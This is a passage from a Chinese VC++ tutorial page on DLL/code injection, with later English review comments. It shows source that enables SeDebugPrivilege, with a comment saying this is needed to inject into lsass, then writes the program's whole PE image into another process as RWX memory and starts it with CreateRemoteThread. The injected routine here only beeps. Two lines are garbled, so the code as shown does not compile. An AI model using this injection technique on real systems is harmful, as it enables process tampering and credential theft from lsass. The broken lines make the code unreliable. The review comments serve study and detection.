
VC++实现DLL注入(二)
2014-11-23 19:33:50 浏览:457
Tags:实现 DLL 注入
ocessID
// printf("Process not found!\n");
return 9999;
}
//
//远程注入函数 www.2cto.com
// Thread routine that InjectExe hands to CreateRemoteThread, i.e. the code that
// runs inside the target process. As written its only observable effect is six
// audible beeps with 200 ms pauses; the MessageBoxA call is commented out. The
// injection primitives themselves live in InjectExe, not here.
// Takes no parameters and returns nothing; no value is reported back to the injector.
void __stdcall RmoteThread()
{
    HMODULE hMod,hMod2;
    fnMessageBoxA myMessageBoxA;   // fnMessageBoxA / fnBeep: function-pointer typedefs, presumably declared earlier in the file (not visible here)
    fnBeep myBeep;
    // NOTE(review): this declares MAX_PATH *pointers*, not MAX_PATH chars; the buffer is
    // larger than intended and is only usable through the (char*) cast below.
    char* path[MAX_PATH];

    hMod = GetModuleHandle("user32.dll");
    hMod2 = GetModuleHandle("kernel32.dll");
    // Neither module handle is checked for NULL before being passed to GetProcAddress.
    myMessageBoxA = (fnMessageBoxA)GetProcAddress(hMod, (LPCSTR)"MessageBoxA");
    myBeep = (fnBeep)GetProcAddress(hMod2, (LPCSTR)"Beep");
    /*for(int i=0;i<30;i++)
    {
    myBeep(800,400);
    }
    */
    // while(1)
    // myBeep is resolved but never used: the loop calls Beep and Sleep directly.
    for(int i=0;i<6;i++)
    {
        Beep(600,100);
        Sleep(200);
    }
    // Reads the host module's path into `path`; the return value (and possible
    // truncation) is not checked, and the result is not used since the MessageBox
    // line below is commented out.
    GetModuleFileName(NULL,(char*)path,MAX_PATH);
    // myMessageBoxA(NULL, (char*)path, NULL, 64);
}

//
// 提升应用级调试权限
// Enables (fEnable != 0) or disables one named privilege on hToken.
// InjectExe calls this with SE_DEBUG_NAME on the current process token; a process
// enabling SeDebugPrivilege is a well-known precursor to cross-process tampering and
// is worth alerting on via privilege-use auditing.
// Returns TRUE only if GetLastError() is ERROR_SUCCESS after AdjustTokenPrivileges.
// AdjustTokenPrivileges can itself succeed while setting ERROR_NOT_ALL_ASSIGNED
// (privilege not held by the token), which this check correctly reports as FALSE.
// NOTE(review): the two lines marked below appear damaged by the page extraction
// (a stray space inside an API name, a missing `?` in the conditional); the text as
// shown does not compile.
BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable)
{
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    // Return value unchecked: an unknown privilege name would leave Luid uninitialized. (garbled identifier, see note above)
    LookupPrivilegeva lue(NULL,szPrivName,&tp.Privileges[0].Luid);
    // (missing `?` between fEnable and SE_PRIVILEGE_ENABLED, see note above)
    tp.Privileges[0].Attributes = fEnable SE_PRIVILEGE_ENABLED:0;
    // Return value unchecked; success is inferred solely from GetLastError() below.
    AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
    return((GetLastError() == ERROR_SUCCESS));
}
//
///说明: 插入代码,远程线程为RmoteThread()
///参数: Pid = 进程PID
///返回: 成功True,否则False

bool InjectExe(DWORD Pid)
{
bool status = false;
LPVOID pBaseAddr = NULL;
HMODULE hMod = GetModuleHandle(NULL);
LONG hNHOffset = PIMAGE_DOS_HEADER(hMod)->e_lfanew;
HANDLE hThread,
hProcess,
hToken;
DWORD cbImage;

//cbImage=内存中整个PE映像体的尺寸
cbImage= PIMAGE_NT_HEADERS((DWORD)hMod + (DWORD)hNHOffset)->OptionalHeader.SizeOfImage;

//重要,否则不能注入lsass
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, Pid);
if (hProcess == NULL)
{
#ifdef debug
MessageBoxA(NULL, "错误OpenProcess", NULL, 64);
#endif
goto Err;
}

//释放远程内存
VirtualFreeEx(hProcess, LPVOID(hMod), 0, MEM_RELEASE);
//分配远程内存
pBaseAddr = VirtualAllocEx(hProcess, LPVOID(hMod), cbImage, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (pBaseAddr == NULL)
{
#ifdef debug
MessageBoxA(NULL, "VirtualAllocEx failed", NULL, 64);
#endif
goto Err;
}

//写进去,将本进程的整个PE体 全写进目标进程,够狠~
if (!WriteProcessMemory(hProcess, pBaseAddr, LPVOID(hMod), cbImage, NULL))
{
#ifdef debug
MessageBoxA(NULL, "WriteProcessMemory failed", NULL, 64);
#endif
goto Err;
}

hThread = CreateRemoteThread(hProcess, NULL, NULL, \
(LPTHREAD_START_ROUTINE)&RmoteThread, NULL, NULL, NULL);
if (hThread == NULL)
{
#ifdef debug
MessageBoxA(NULL, "CreateRemoteThread failed", NULL, 64);
#endif
goto Err;
}

// WaitForSingleObject(hThread, INFINITE);